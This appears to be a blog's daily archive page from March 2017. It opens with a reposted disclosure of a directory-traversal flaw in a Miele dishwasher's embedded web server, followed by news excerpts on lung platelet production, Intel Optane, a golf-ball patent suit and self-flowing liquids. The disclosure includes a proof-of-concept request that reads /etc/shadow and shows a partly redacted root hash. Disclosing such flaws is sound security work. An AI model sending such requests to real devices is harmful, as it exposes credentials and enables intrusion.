Daily Archives: March 31, 2017

Miele Professional PG 8528 dishwasher insecure – Web Server Directory Traversal

Posted on by
Reply

Details:
========
The corresponding embeded webserver “PST10 WebServer” typically listens
to port 80 and is prone to a directory traversal attack, therefore an
unauthenticated attacker may be able to exploit this issue to access
sensitive information to aide in subsequent attacks.

Proof of Concept:
=================
~$ telnet 192.168.0.1 80
Trying 192.168.0.1…
Connected to 192.168.0.1.
Escape character ist ‘^]’.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1

HTTP/1.1 200 OK
Date: Wed, 16 Nov 2016 11:58:50 GMT
Server: PST10 WebServer
Content-Type: application/octet-stream
Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT
Content-disposition: attachment; filename=”./etc/shadow”
Accept-Ranges: bytes
Content-Length: 52

root:$1$$Md0i[…snip…]Z001:10933:0:99999:7:::

Fix:
====
We are not aware of an actual fix.

Full disclosure

Why would anyone want a webserver on their dishwasher?!

An Unexpected New Lung Function Has Been Found – They Make Blood

Posted on by
Reply

Researchers have discovered that the lungs play a far more complex role in mammalian bodies than we thought, with new evidence revealing that they don’t just facilitate respiration – they also play a key role in blood production.

In experiments involving mice, the team found that they produce more than 10 million platelets (tiny blood cells) per hour, equating to the majority of platelets in the animals’ circulation. This goes against the decades-long assumption that bone marrow produces all of our blood components.

Source: An Unexpected New Lung Function Has Been Found – They Make Blood

Intel Claims Optane Memory Will Speed Your Computer Up for Cheap

Posted on by
Reply

ntel’s new Optane memory is, according to Intel, an entirely new type of computer memory. It’s based on the 3D Xpoint memory architecture Intel announced back in July 2015. It’s as fast as the DRAM memory found in every computer used today, but as stable as the NAND memory found in the SSDs central to most of your pricier laptops.
[…]
And according to Intel, when its slotted into a computer alongside DRAM it speeds that computer up incredibly—giving you the kind of benefits traditionally only seen when you use a solid state drive. Intel claims computers power on twice as fast as they would without Optane, browsers launch five times faster, and games can launch up to 67 percent faster.

Intel Optane memory works as a kind of supercharger for a computer’s storage system. It doesn’t replace any components already in a computer. Instead it’s an add-on, clipped into the motherboard. In a computer’s processes Optane memory sits between the hard drive and the processor—remembering regularly accessed data, like RAM might, but retaining that information even when a program is closed or the computer is turned off.
[…]
Currently Optane memory will only be available for desktop computers with Kaby Lake processors and “Optane memory ready” motherboards (check the documentation for your motherboard to confirm)
[…]
For people who currently own a computer that’s Optane memory ready, it will fit into the M.2 slot on your motherboard—the same one currently used by the fastest solid state drives available, and as with DRAM memory, more is better. Optane memory will come in two sizes when it goes on sale April 24: 16GB ($44) and 32GB ($77).

Source: Intel Claims Its Magical New Memory Will Speed Your Computer Up for Cheap

Costco golf ball suit shows how threatening with unfounded patent accusations causes companies to die

Posted on by
Reply

Indeed, Costco might just be trying to beat Acushnet at a legal game that the ball maker has mastered—court sport. Acushnet has managed to muscle out other upstarts easily, simply by filing complaints.

Tiny manufacturers who can’t afford to litigate have been forced to fold based on Acushet’s accusations alone, with no proof of infringement. For example in 2015, Acushnet sued five small golf-ball makers. The co-founder of one of these companies, speaking on condition of anonymity because of the terms of the settlement, told Quartz that’s just how business is done.

Companies with deep pockets lock down the market by making it too expensive for competitors to operate and to offer lower-priced yet quality products. It is a legitimate tactic; even those who succumb to it don’t really begrudge the approach. The co-founder of the smaller competitor sued by Acushnet said he believes the company decides who to sue based on Golf Digest’s Hot List, which signals potential competitors, and that the company files claims regardless of actual infringement.

Source: A lawsuit over Costco golf balls shows why we can’t have nice things cheap

What a great system the patent and law system is!

Self flowing liquids

Posted on by
Reply

Imagine a liquid that could move on its own.

No need for human effort or the pull of gravity. You could put it in a container flat on a table, not touch it in any way, and it would still flow.

Brandeis researchers report in a new article in Science that they have taken the first step in creating a self-propelling liquid. The finding holds out the promise of developing an entirely new class of fluids that can flow without human or mechanical effort. One possible real-world application: Oil might be able to move through a pipeline without needing to be pumped.

Researchers recreate the system that causes cells to change shape. The result: a liquid that can move by itself.